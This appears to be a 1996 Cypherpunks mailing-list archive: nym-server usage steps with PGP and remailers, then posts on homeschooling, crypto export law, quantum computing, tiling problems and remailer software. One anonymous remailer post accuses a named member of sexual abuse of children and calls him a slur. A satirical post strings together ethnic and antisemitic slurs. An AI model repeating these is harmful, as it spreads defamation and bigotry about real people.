- Run 'pgp -esa -u "pseudonym" anon at as-node filename' to sign the mail with the nym's key, and encrypt it for the server.

- Mail the result to anon at as-node.jena.thur.de with a Subject: header that does not include the words 'help' or 'send' (It is recommended that you do this through one or more anonymous remailers.)

..post an article?

- Write the article's body, remembering not to include any information about your true identity.
- Add the following headers at the top of the mail:

  Newsgroups: a.newsgroup.name
  Subject: Article's subject line

  (If cross-posting, remember that a Followup-To: header is required.)

  Leave a blank line between the headers and the body.

- Save the file.

- Run 'pgp -esa -u "pseudonym" anon at as-node filename' to sign the mail with the nym's key, and encrypt it for the server.

- Mail the result to anon at as-node.jena.thur.de with a Subject: header that does not include the words 'help' or 'send' (It is recommended that you do this through one or more anonymous remailers.)

..request Email to be delivered?

- Create a file containing the following:

  Reply-To: address at for.delivery

  Leave a blank line after the header.

- Save the file.

- Run 'pgp -esa -u "pseudonym" anon at as-node filename' to sign the mail with the nym's key, and encrypt it for the server.

- Mail the result to anon at as-node.jena.thur.de with a Subject: header that does not include the words 'help' or 'send' (It is recommended that you do this through one or more anonymous remailers.)

Things to remember
~~~~~~~~~~~~~~~~~~

- Never send mail directly to the server. Always use at least one remailer to hide your identity. The best way to protect yourself against a police 'request' is to ensure that the server cannot determine your identity.

- Use Mixmaster remailers for increased protection. Use mixmaster at as-node.jena.thur.de as the final hop to defeat traffic analysis.

- Never request a delivery to your real Email address.
Typ Bits/ID Datum Benutzer
Type bits/keyID Date User ID
öff 1024/D3305539 1996/05/01 Jenaer Anonymous Service

Jenaer Mixmaster Anonserver
=-=-=-=-=-=-=-=-=-=-=-=
jenanon mixmaster at as-node.jena.thur.de 54e0023828fabe0b85e83b3d458134e3 2.0.3

From snow at smoke.suba.com Mon Sep 23 02:09:00 1996
From: snow at smoke.suba.com (snow)
Date: Mon, 23 Sep 1996 17:09:00 +0800
Subject: Informal Renegotiation of the Law
In-Reply-To: <19960918160153703.AAC88@IO-ONLINE.COM>
Message-ID: <199609230243.VAA00509@smoke.suba.com>

Mr.
Adams wrote: > On Sun, 15 Sep 1996 17:54:49 -0500 (CDT), snow wrote: >>> For example, you will not read anywhere that compulsory education laws have >>> rare. Compulsory education has been effectively repealed by the actions of >>> refusenicks in both the subject population and the enforcement population. >> Their children are still getting educated. Not thoroughly enough in >>some cases, but educated in the basics. >It has always seemed somewhat amusing that we will have a) a widespread opinion >that homeschooling is of lesser value and b) numerous studies, surveys, >testimonials, reports, etc, that show what a rotten job public education is >doing*. This raises the question of how anyone even remotely concerned with >their children's welfare could do worse. . . Yet another unexplained mass >insanity. I would agree that parents can do as good or better at _most_ subjects thru about the 3rd or 4th grade, and I do agree that most of todays schools are shit, however there is one area--social skills--that homeschooling simply can't compete. Children need to learn how to interact with one another in groups larger than a family unit. I don't think that homeschooling can accomplish this nearly as well as the public (or private) schools could. I also don't think this is as important as, say Math, Science, or English. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From dustman at athensnet.com Mon Sep 23 02:38:19 1996 From: dustman at athensnet.com (Dustbin Freedom Remailer) Date: Mon, 23 Sep 1996 17:38:19 +0800 Subject: A daily word of caution in reference Tim C[unt] May Message-ID: <199609230540.BAA16639@godzilla.athensnet.com> Tim C[unt] May is not only as queer as a three dollar bill, but he is also into having sex with children. From tcmay at got.net Mon Sep 23 02:43:55 1996 From: tcmay at got.net (Timothy C. 
May) Date: Mon, 23 Sep 1996 17:43:55 +0800 Subject: Snake-Oil FAQ Message-ID: At 1:41 AM 9/23/96, steven ryan wrote: >At 05:27 AM 9/22/96 -0700, you wrote: >>My view is that people interested in buying and using crypto are either >>bright enough to learn, or are not. A "Snake Oil FAQ" is largely >>unnecessary, for either category. For the first, because they're bright. >>For the second, because they're not. > >My view is that there is a large third group of people who are bright >enough to learn, but don't have the time or inclination to read books or do >extensive research on the subject. There are a lot of people using PGP for >the wrong reason, not because they read the books or did the research. Nor >do they even understand how it works as opposed to how it is used. They are >using it because they cruised the net and read good things about it or >heard it was cool. Well, there are a bunch of books out on PGP, which they can read. And there are already some good FAQs out on the basics of cryptography--surely concise enough and yet detailed enough to warn folks away from some basically flawed programs. But just how far can one go? Some people just won't be taught, despite the several very-accessible books on PGP and crypto. So? And I don't really think there's a problem. Just how many of these "Snake Oil" crypto programs are people really _buying_? And does it matter if they buy a reasonably-competent program (*) like "DiskLock" instead of using 3DES or one of the good disk encryption programs? (* By "reasonably competent" I mean not "snake oil," and roughly able to do the job for which it was intended. Many people just want casual-grade crypto, to stop casual attempts to look at what they've written. We may disagree with them, but, hey, it's their choice. I maintain that these people are unlikely to read something called "The Snake Oil FAQ.") To coin a phrase, you can lead a person to strong crypto, but you can't make him drink. 
>A Snake Oil Faq could help prevent these people from choosing wrong >products. It would also be very helpful to have all the arguments in one >place in one concise faq. Before I joined this list and read Applied At some point this becomes YACB (Yet Another Crypto Book). If you and others want to donate time to help educate the (small, I think) class of users who won't read the PGP books, or the PGP articles in the magazines, and yet who you think are smart enough...blah blah...well, go ahead and write such a thing. (BTW, Schneier has a book out on "Security for the Macintosh," a kind of watered-down intro to crypto and security....he makes the points a "Snake Oil FAQ" might make...again, I think this is an overcrowded market.) >Cryptography I was in a discussion in a previous job about securing one of >our products. The programmer wanted to protect the key with a convoluted >series of transpositions. I knew it was dumb but couldn't successfully >argue the point why. A faq would have been helpful. Wouldn't arguments out of the standard textbooks have been just as effective, and perhaps even more "credentialled" than words from a FAQ? I hope you are not expecting that a FAQ would have the precise magic words dealing with your programmer friend's situation? At best, it would contain some reworded arguments out of the well-known textbooks. I just don't see the point. But if it keeps folks busy, and happy, I guess it's harmless. (:-}) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway."
From shamrock at netcom.com Mon Sep 23 02:55:32 1996 From: shamrock at netcom.com (Lucky Green) Date: Mon, 23 Sep 1996 17:55:32 +0800 Subject: Informal Renegotiation of the Law In-Reply-To: <199609230243.VAA00509@smoke.suba.com> Message-ID: On Sun, 22 Sep 1996, snow wrote: > I would agree that parents can do as good or better at _most_ subjects > thru about the 3rd or 4th grade, and I do agree that most of todays schools > are shit, however there is one area--social skills--that homeschooling > simply can't compete. Children need to learn how to interact with one another > in groups larger than a family unit. I don't think that homeschooling can > accomplish this nearly as well as the public (or private) schools could. I understand that many parents that homeschool belong to organizations that provide for meetings twice a week in which the children so educated in a certain area get together. Homeschooling does not have to stand in the way of a normal socialization process. --Lucky From rp at rpini.com Mon Sep 23 02:58:40 1996 From: rp at rpini.com (Remo Pini) Date: Mon, 23 Sep 1996 17:58:40 +0800 Subject: Where to write crypto? Message-ID: <9609230633.AA18985@srzts100.alcatel.ch> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: cypherpunks at toad.com Date: Mon Sep 23 08:31:11 1996 > > > On Sat, 21 Sep 1996, Dan McGuirk wrote: > > If I want to go to a country outside the United States to write > cryptographic code that will be freely distributable, what's the > best place to go? Switzerland has NO crypto laws (yet)... 
- ------< fate favors the prepared mind >------ Remo Pini rp at rpini.com PGP: http://www.rpini.com/crypto/crypto.html - ----< words are what reality is made of >---- From tcmay at got.net Mon Sep 23 03:04:44 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 23 Sep 1996 18:04:44 +0800 Subject: Public Schools Message-ID: At 4:31 AM 9/23/96, Lucky Green wrote: >On Sun, 22 Sep 1996, snow wrote: >> I would agree that parents can do as good or better at _most_ subjects >> thru about the 3rd or 4th grade, and I do agree that most of todays schools >> are shit, however there is one area--social skills--that homeschooling >> simply can't compete. Children need to learn how to interact with one another >> in groups larger than a family unit. I don't think that homeschooling can >> accomplish this nearly as well as the public (or private) schools could. > >I understand that many parents that homeschool belong to organizations >that provide for meetings twice a week in which the children so educated >in a certain area get together. Homeschooling does not have to stand in >the way of a normal socialization process. Also--and I mean this point completely seriously!--many parents are not altogether convinced that the "public school socialization" is all that beneficial. Do kids really _need_ to learn to wear gang colors, smoke to be cool, get pregnant at age 14, and so on?
An awful lot of accomplished persons grew up in isolated areas, on small farms, and were educated in very small classrooms (or at home). I think the "social skills" Snow talks about above are actually the _worst_ part of public schools in fin-de-Siecle America. If I had a kid, I wouldn't want him or her in the local public schools. (And my area is more remote than over in San Jose--San Francisco, which is even worse. And LA is even worse.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From mccoy at communities.com Mon Sep 23 03:27:12 1996 From: mccoy at communities.com (Jim McCoy) Date: Mon, 23 Sep 1996 18:27:12 +0800 Subject: Evolving algorithm for faster brute force key searches? In-Reply-To: Message-ID: Adam Shostack [...] > Weak systems are thus useful for research and training >purposes. I suspect Tim is on the money with a genetic algorithm >having a flat `fitness landscape,' but there may be something that a >human misses which an evolved algorithm finds. > > Also, it may be possible to evolve something against a >reduced round version of a cipher (using a training space that is not >flat) that will still work better than brute force against a full >system. If you have cycles to spare, it might be an interesting >avenue of research.
While a well-designed algorithm has a flat search space in the case of a single instance of a particular ciphertext/plaintext, this is not necessarily the case for repeated encryptions using the same key and possibly for other examples (hence differential cryptanalysis, etc.) If there is a way to break a system that is less than a brute-force search of all possible keys then the landscape is not flat. The hard part with making such discoveries using evolutionary methods is that even if the landscape is not completely flat the positive and negative reinforcement needed to perform selection in such an environment almost always necessitates that the fitness function be crafted with this in mind by the researcher and few evolutionary programming researchers know anything about crypto. While there are a few strikes against such research (as the oft repeated "flat landscape" phrase shows) I would not let the current state of the art in this area dissuade anyone interested. Most of the research done so far has been done by people who either knew little about crypto or little about evolutionary programming. There are also other areas of crypto relevance which may prove more amenable to evolutionary programming methods, like factoring... jim From mccoy at communities.com Mon Sep 23 03:35:47 1996 From: mccoy at communities.com (Jim McCoy) Date: Mon, 23 Sep 1996 18:35:47 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: Message-ID: Brian Davis [...] >Constitutional literalists take note: the First Amendment says nothing >about what the executive branch or the states can do .... The states are prohibited through the 14th Amendment via the Slaughterhouse cases, the ability of the executive branch to violate due process is questionable (from a legal viewpoint, not a practical one...the President cannot order you placed in jail unless you have broken a law which requires congress to have made the law in the first place...)
jim From bdavis at thepoint.net Mon Sep 23 03:42:39 1996 From: bdavis at thepoint.net (Brian Davis) Date: Mon, 23 Sep 1996 18:42:39 +0800 Subject: Mercenaries In-Reply-To: Message-ID: On Wed, 18 Sep 1996, Timothy C. May wrote: > At 9:40 PM 9/17/96, William Knowles wrote: > > >What about the French Foreign Legion? or the Volunteers for Israel, > >which isn't really a fighting force, but Americans can help keep > >the Israeli army at a ready state. > > Israel is one of several states which the U.S. allows dual citizenship > with. For political reasons, because of America's extermination of the Jews > in WW II (Whoops, we were on the other side...so why do we have such a cozy > deal with Israel, but not with, say, France? Beats me. Politics.) > > Brian Davis, our former Prosecutor, can tell us how likely it is that any > person would be charged and brought to trial for being a paid mercenary for > some small country in the Third World. The CIA is often behind such > mercenaries, so national security issues could make the issue murky. Exceedingly unlikely. A variety of practical problems. If you came up to a U.S. Attorney to show him your picture on the cover of The Zaire Daily News as mercenary of the week and spit in his face, you'd get prosecuted. For spitting in the prosecutor's face. On a slightly more serious note: you'd only get prosecuted if someone at Main Justice (i.e. in Washington) wanted you prosecuted. EBD > > But the real reason such prosecutions are rare is that the government > realizes how Orwellian it sounds to say: > > "You are being prosecuted because you were a mercenary for Oceania in its > war with Eastasia. While Oceania was once our ally in our battle with > Eastasia, and we endorsed and financed your role as a mercenary, we became > allies with our great friend Eastasia and are now in a state of war with > the tyrants of Oceania." > > > >Explicit isn't a dirty word, Or is it?
> > AOL has declared "explicit" to be a Banned Word, along with "pissant," > "craps," and "cock," and numerous other such ordinary words. (So much for > mentioning their pissant policies, a game of craps in Las Vegas, or a male > chicken.) > > --Tim May > > We got computers, we're tapping phone lines, I know that that ain't allowed. > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^1,257,787-1 | black markets, collapse of governments. > "National borders aren't even speed bumps on the information superhighway." > > > > > From tcmay at got.net Mon Sep 23 04:04:16 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 23 Sep 1996 19:04:16 +0800 Subject: Kicking the Furriners out of our Classrooms Message-ID: At 6:19 AM 9/23/96, Matthew Gream wrote: >Hi there, > >> An anonymous opinion from inside the Defence Dept holds that electronic >> bits on a wire do not constitute goods, and as a result if you ship >> electronically, you are not subject to the regulations. If you ship a >> CD or floppy or other physical media containing software, you violate the >> regulations. > >Watch out for those anonymous opinions; I received exactly the opposite >opinion when I spoke to the Defence Signals Directorate about the issue >(back in 1994) -- after specifically asking about a few hypothetical >cases. Of course, either opinion may be correct, which is the real >problem! Cindy Cohn made the excellent point at the Bernstein hearing that the ITARS are so vague and overbroad that a professor cannot be sure if his lecture is violating the law because foreigners are in the audience (a la the Junger case). As she notes, nearly all college and postgraduate classes are heavily populated by non-U.S. 
citizens, and the ITARs specifically make illegal the propagation of certain items to non-U.S. citizens. (There is no exemption in the ITARs for university professors teaching their classes. If foreigners are in the classroom, and cryptographic or weapons-related knowledge is imparted, an ITAR violation has probably occurred.) Personally, I'd relish the opportunity to say to my class: "Now, the International Trafficking in Arms Regulations, the ITARs, make it a felony for me to disclose certain methods or techniques to non-U.S. citizens. Accordingly, in this class, I must insist that all non-U.S. citizens, or suspected Israelis, ragheads, Papists, or Marxists, illegal Mexicans, etc., leave the lecture hall immediately. All those remaining must present at least five forms of identification, dating back at least to 1978. Foreign-looking persons should provide at least seven forms of identification, including documentation that they are not in the U.S. illegally. Jew-looking or Jew-sounding names will be subjected to special scrutiny to ensure that they are not dual-citizens with the ITAR-restricted Zionist Entity. "Oh, and since classroom participation counts for 65% of your grade, those I exclude under the ITAR restrictions had better score 155% on the exams I let you into the classroom to take, else you'll flunk. Good luck, you fucking foreigners!" (Cindy Cohn pointed out to the court that their might also be 14th Amendment problems with enforcement of the ITARs with regard to teaching in universities.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. 
"National borders aren't even speed bumps on the information superhighway." From geoffk at discus.anu.edu.au Mon Sep 23 04:24:47 1996 From: geoffk at discus.anu.edu.au (Geoffrey KEATING) Date: Mon, 23 Sep 1996 19:24:47 +0800 Subject: Macintosh Mixmaster port... Who's doing it? In-Reply-To: <3.0b19.32.19960922162606.006c1644@ricochet.net> Message-ID: <199609230818.SAA00330@discus.anu.edu.au> > Date: Sun, 22 Sep 1996 16:26:11 -0700 > From: Greg Broiles > At 03:16 PM 9/22/96 -0500, Adam Shostack wrote: ... > I'm pottering around with a Java-based remailer that acts like a POP client > so it can run on a client machine, not a Unix box; but other people should > take that as a challenge to see if they can finish one before/better than > me, not a reason to avoid writing one. Hal Finney has already done some > very nice work with Java and mailing; see his home page (the address of > which I don't have immediately at hand) for more details. Hal is at http://www.portal.com/~hfinney/ . I have a prototype PGP-encryption implementation in Java, which I was intending to build into a remailer _client_ (I think remailers themselves will be better written in C for performance reasons, or at least the crypto portions); at first, for 'type I' remailers, then perhaps for mixmaster. The prototype, which just encrypts to a public key, has been put at http://www.ozemail.com.au/~geoffk/pke/ . I'd appreciate people looking over it, particularly the random number generation. [The prototype is actually somewhat useful. It's about as secure as downloading PGP in binary form... ] -- -Geoff Keating (geoffk at ozemail.com.au, Geoff.Keating at anu.edu.au) From tcmay at got.net Mon Sep 23 05:41:35 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 23 Sep 1996 20:41:35 +0800 Subject: provably hard PK cryptosystems Message-ID: I want to say something about "tiling problems," an area I find very exciting. 
I ordinarily would not have commented on "quantum computers," but will make just a couple of comments, since I want to comment later on tilings. At 9:58 PM 9/22/96, Adam Back wrote: ... >I'm not sure about quantum computers, some people who know much more >about particle physics than I do seemed initially sceptical, and >didn't think it was doable. However I have read some optimistic >sounding news clippings (on the list) which sounded as if things are >progressing well, with techniques being found using redundancy to get >around what were earlier problems of reliability. Is this accurate >reporting (thinking of garbled stories by over enthusiastic >journalists)? I'd be interested to hear opinions from anyone who does >know about particle physics about the likelihood of practical quantum >computers being practical in the next 20 years or so. Caveat: I'm a skeptic on quantum computers. I've read a couple of the early papers, but am not current. And I certainly am not an expert. For what it's worth: * I think it's nearly certain that no significant results will be gotten in the next 20 years, probably not in the next 50 years. (I personally am skeptical that significant results will be gotten in 200 years, and probably never, but this is a harder point to make.) * Sure, there may be demonstrations of a "collapsed quantum state" which is isomorphic to factoring a number like "42," but not 50-digit numbers anytime soon. And, I feel, a 300-digit number is probably many, many orders of magnitude harder. * Experts may point to partial successes, and maybe they're right. But I'm skeptical. The recent post by someone outlining a bunch of "promising approaches" has got me thinking of spending some more time looking at recent results, though. I doubt anything will happen in the next 20 years...that just isn't much time in the high-tech business (which may sound crazy, but it's true).
(A way to "creatively visualize" this point is this: for those of you who are now 25, when you are 45 the world will probably _not_ be radically different. Sure, computers will be faster and cheaper, but most things will look _mostly_ the way they look today. Not a compelling argument, perhaps, but one which makes sense to me. When I was 25 I suppose I expected dramatic advances to come...largely, they haven't. I can elaborate on this if there's sufficient interest.) >One other area that did sound promising was some kind of mapping >problem in n dimensional tiling that Tim was discussing at a physical >meet while I was over in the US. A news clipping posted to One of the most interesting books I've read is David Harel's "Algorithmics: The Spirit of Computing." (Warning: The book came out in a second edition, which as near as I can tell took out some parts and synopsized the book a bit. My reading was of the First Edition.) Harel described Huang's work on "tiling problems." These are easier to describe with pictures, and I don't have the time to try to generate ASCII representations of tiles. So, I refer people to Harel's book. Briefly, imagine a grid in a plane. Imagine a set of "dominoes" or "tiles" with different edge properties, e.g., some edges are blue, some red, some green, etc. (or the edges can be numbered, have symbols on them, etc.). Suppose one has an unlimited supply of, for example, N different type of tiles. Suppose a tile is placed at some place on the grid, and another tile (possibly a different tile, possibly the same type of tile) is placed some distance away on the grid. The problem is this: Can a "domino snake" be found which reaches from the first tile to the second tile, with the constraint that edges must match up on all tiles? (And all tiles must be in normal grid locations, of course) If the grid area is, say, a finite space, then clearly an exhaustive search of all legal domino snakes would answer the question. 
(However, even a relatively small grid of, say, 8 x 8, generates a truly enormous number of possible snakes, each of which must be tested. Of course, if a domino snake is "guessed" (a la the "nondeterministic" language one encounters in complexity theory), verification that it is an answer is nearly instantaneous (one glances at the solution and verifies it). If the grid is unlimited, then even if the two initial tiles are located close together, there are of course an infinite number of possible snakes.... (Oddly, to me, the domino snake problem is "more undecidable" in the infinite half-plane than in the full infinite plane....) Huang proved that the domino tiling problem is formally equivalent to the standard set of NP problems (consult Harel, or Huang, for more details and more precise language...I'm just going from recollection here!). I like this approach because I can easily visualize the domino tiling problem and can make some points about expansion of knowledge into uncharted areas (research and tool-building is a kind of domino snake expansion, with local laws of physics, etc., the constraints on stepping stones (hand wave inserted here)). I find this easier to understand than more "algebraic" and "logical" versions, such as the representation problem and the word problem. (These other NP problems are also described in Harel (and in standard complexity books, such as Garey and Johnson, Papadimitriou, etc.). It has always been a great hope that some of the provably-hard problems be adapted for use in crypto. And yet factoring remains the core of popular modern crypto programs (discrete logs, too, for D-H). I don't think this is a major cause for worry, though. It's not as if factoring is suddenly going to become "easy." (I think the consensus is that factoring _is_ hard. Whether RSA is really equivalent to factoring also hasn't been proved, as folks have noted, but many think it is, loosely speaking.)
--Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Mon Sep 23 05:54:52 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 23 Sep 1996 20:54:52 +0800 Subject: Mercenaries Message-ID: At 4:45 AM 9/23/96, Brian Davis wrote: >On Wed, 18 Sep 1996, Timothy C. May wrote: >> Brian Davis, our former Prosecutor, can tell us how likely it is that any >> person would be charged and brought to trial for being a paid mercenary for >> some small country in the Third World. The CIA is often behind such >> mercenaries, so national security issues could make the issue murky. > >Exceedingly unlikely. A variety of practical problems. If you came up >to a U.S. Attorney to show him your picture on the cover of The Zaire Daily >News as mercenary of the week and spit in his face, you'd get prosecuted. > >For spitting in the prosecutor's face. > >On a slightly more serious note: you'd only get prosecuted in someone at >Main Justice (i.e. in Washington) wanted you prosecuted. This of course matches my expectation. I still think if prosecution is so unlikely, the law ought to actually come to terms with this and remove the "official illegality" of such things. _Almost_ more important to me than "libertarian" ideals are "consistency" ideals: namely, that there oughtn't to be laws which are not enforced, or which are too expensive to enforce, or which can be selectively enforced. 
And since I know that the full suite of laws, all 25,000 or 45,000 of them (on all 27 linear feet of bookshelf space) cannot possibly be consistently enforced, I favor a "minimalist" or "fallback" position of having relatively few laws, covering mostly "crimes" which are more easily detected and prosecuted (with draconian punishments). >> But the real reason such prosecutions are rare is that the government >> realizes how Orwellian it sounds to say: >> >> "You are being prosecuted because you were a mercenary for Oceania in its I was probably overstating things to say this was "the real reason." The real reason (or the more important reason) is that resources are finite, and, as Brian noted, no prosecutor is much interested in someone being in Zaire's mercenary army. It doesn't register on the public's concern meter, and it probably doesn't get one promotions in the prosecutorial community. But the law should still be changed to reflect this reality. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Mon Sep 23 06:31:11 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 23 Sep 1996 21:31:11 +0800 Subject: Bernstein hearing: The Press Release Message-ID: At 5:10 AM 9/23/96, Brian Davis wrote: ... >There isn't such a clause. The allowed restrictions were developed in >case law. > >Constitutional literalists take note: the First Amendment says nothing >about what the executive branch or the states can do .... 
Which is why President Jefferson was able to say: "While the Constitution says "Congress shall make no law...," I am hereby outlawing all discussion of the following subjects:.... And I have had it with the Catholics and Jews in this country. While Congress has no power to make laws respecting the establishment of religion or the exercise thereof, I am under no such restrictions. Therefore, I am ordering the immediate arrest and summary execution of all Papists and Jews...." Seriously, does not the Constitution and Bill of Rights define what states may do? And Presidents? The Executive is under various restrictions, and cannot behave unconstitutionally. After all, if Alabama, for example, reinstituted slavery, would not the 14th Amendment trump this? If California were to, say, ban speech critical of women's or homosexual's rights, would not the First Amendment trump this attempt? --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From adam at homeport.org Mon Sep 23 07:25:22 1996 From: adam at homeport.org (Adam Shostack) Date: Mon, 23 Sep 1996 22:25:22 +0800 Subject: Where to write crypto? In-Reply-To: <9609230633.AA18985@srzts100.alcatel.ch> Message-ID: <199609231224.HAA02299@homeport.org> Remo Pini wrote: | > If I want to go to a country outside the United States to write | > cryptographic code that will be freely distributable, what's the | > best place to go? | | Switzerland has NO crypto laws (yet)... Switzerland is not the most liberal (libertarian) of countries. 
Getting a work permit can be very tough. However, there are crypto companies and research groups. Haeglin and ETH-Zurich (ETH is Swiss Federal Institute of Technology) spring to mind. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From geoffk at discus.anu.edu.au Mon Sep 23 07:50:56 1996 From: geoffk at discus.anu.edu.au (Geoffrey KEATING) Date: Mon, 23 Sep 1996 22:50:56 +0800 Subject: (Fwd) Australian "ITAR" regulations In-Reply-To: <199609230132.LAA08960@rosella.osa.com.au> Message-ID: <199609230830.SAA00374@discus.anu.edu.au> > Peter Trei writes: > > Forwarded from the cypherpunks list... > > http://www.austlii.edu.au/cgi-bin/sinodisp.pl/au/legis/cth/consol_reg/cer439/sch13.html?query=cryptographic > > Thanks for posting this URL Peter. Of particular note is the heading: > > > 43. Other goods as follows: > > An anonymous opinion from inside the Defence Dept holds that electronic > bits on a wire do not constitute goods, and as a result if you ship > electronically, you are not subject to the regulations. If you ship a > CD or floppy or other physical media containing software, you violate the > regulations. If you glance at reg. 13b, under 'software', you'll find that it specifically says '"software" means [program(s)] fixed in any tangible medium of expression'. -- -Geoff Keating (Geoff.Keating at anu.edu.au) From frissell at panix.com Mon Sep 23 07:52:51 1996 From: frissell at panix.com (Duncan Frissell) Date: Mon, 23 Sep 1996 22:52:51 +0800 Subject: Where to write crypto? Message-ID: <3.0b19.32.19960923075240.00e9ea44@panix.com> At 08:33 AM 9/23/96 +0200, Remo Pini wrote: >Switzerland has NO crypto laws (yet)... > However they are cooperating with the Gang of Seven (G7) Net restriction efforts. See: http://www.admin.ch/ejpd/d/bj/internet/indexe.htm DCF From adam at homeport.org Mon Sep 23 08:31:00 1996 From: adam at homeport.org (Adam Shostack) Date: Mon, 23 Sep 1996 23:31:00 +0800 Subject: Internet File System? 
In-Reply-To: <1.5.4.32.19960922191022.00736898@pop.mindspring.com>
Message-ID: <199609231251.HAA02343@homeport.org>

John Brothers wrote:
| The other day, it occurred to me that Java could really take off if there
| was some sort of file system. And, since you can't write to local files
| with Java, the obvious solution is to set up the 'fopen, fclose(), etc)
| set of functions that are 'rpcs' to some server application on the same
| computer as the web server the applet comes from.

Interesting idea. But, this requires that for disk access, the applet
have network access. Violates the principle of least privilege.

The correct solution seems to me to give the applet limited local disk
access. To those who claim this can't be done, I point to the UNIX
kernel, which, with a small set of primitives, controls disk access
pretty effectively. (Quotas were added in 1984.) This micro kernel
could be added outside of the Java VM, so that the Java code can't
touch it, only call it.

The V7 kernel is pretty small and efficient by today's standards.
Might want to use BSD4.4 instead, and also get portals, which would
allow you to use /dev/tcp/www.netscape.com/80 as a file with certain
permissions.

See http://www.bsdi.com/bsdi-man?proto=1.1&msection=ALL&apropos=1&query=portal

Adam

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From m5 at tivoli.com Mon Sep 23 08:48:40 1996
From: m5 at tivoli.com (Mike McNally)
Date: Mon, 23 Sep 1996 23:48:40 +0800
Subject: Public Schools
In-Reply-To:
Message-ID: <324677FF.3A48@tivoli.com>

Timothy C. May wrote:
>
> At 4:31 AM 9/23/96, Lucky Green wrote:
> >On Sun, 22 Sep 1996, snow wrote:
> >> I would agree that parents can do as good or better at _most_
> >> subjects thru about the 3rd or 4th grade, and I do agree that
> >> most of today's schools are shit, however there is one area--
> >> social skills--that homeschooling simply can't compete.
Proponents of mass public education love to trot that one out, probably because it sounds good and appeals to common sense. However, I sincerely doubt it's true in any way. For example, I'd like to see some actual comparison of the social skills (and, umm, how do you measure that anyway? I don't remember taking any social skills tests in school to make sure I was acquiring that valuable stuff) of public school victims and homeschooled people. If it's such a problem, where are all those social freaks who got that way due to homeschooling? Before the Industrial Revolution, homeschooling was of course quite common. Many "public schools" were simply cheap boarding houses for lower-middle class children (see Nicholas Nickelby for a colorful example). Those with the means hired tutors. > >> Children need to learn how to interact with one another in groups > >> larger than a family unit. I don't think that homeschooling can > >> accomplish this nearly as well as the public (or private) schools > >> could. Please note that homeschooling does not imply that parents isolate their children from contact with the world until they're at voting age. Also, note that the public elementary schools I attended seemed hell-bent on *preventing* any sort of interaction with a group of peers. I don't recall being encouraged to do much but shut up and perform the uninspired textbook assignments I was given. ______c_________________________________________________________________ Mike M Nally * IBM % Tivoli * Austin TX * How quickly we forget that mailto:m5 at tivoli.com mailto:m101 at io.com * "deer processing" and "data http://www.io.com/~m101/ * processing" are different! From DMiskell at envirolink.org Mon Sep 23 09:19:30 1996 From: DMiskell at envirolink.org (Daniel Christopher Miskell) Date: Tue, 24 Sep 1996 00:19:30 +0800 Subject: A daily warning regarding Tim ... 
[edited]
Message-ID:

>On Fri, 20 Sep 1996, John Anonymous MacDonald wrote:
>
>> Tim C[*] * studied yoga back-stretching exercises for
>> five years so he could * * (*).
>
>Likely the NSA has nothing better to do these days. They got bored with
>just listening, so now they're spamming. Can we lock this fucker out of
>the list? Sure, he'll probably pick another nym to post from...
>

Can't lock him out of the list, but you can either set up a kill file, or find
something like the 3.0b version of Eudora, which has filters; you can set it up
where, if an incoming message has a certain From: string, it is transferred
directly into the Trash mail folder, which is, as a rule, cleaned up before
quitting.

Daniel.

--
If in fact we are the only intelligent life on this planet, why the fuck are
we in this goddamn mess?
--
Find my public key on the World Wide Web -- point your browser at:
http://bs.mit.edu:8001/pks-toplev.html

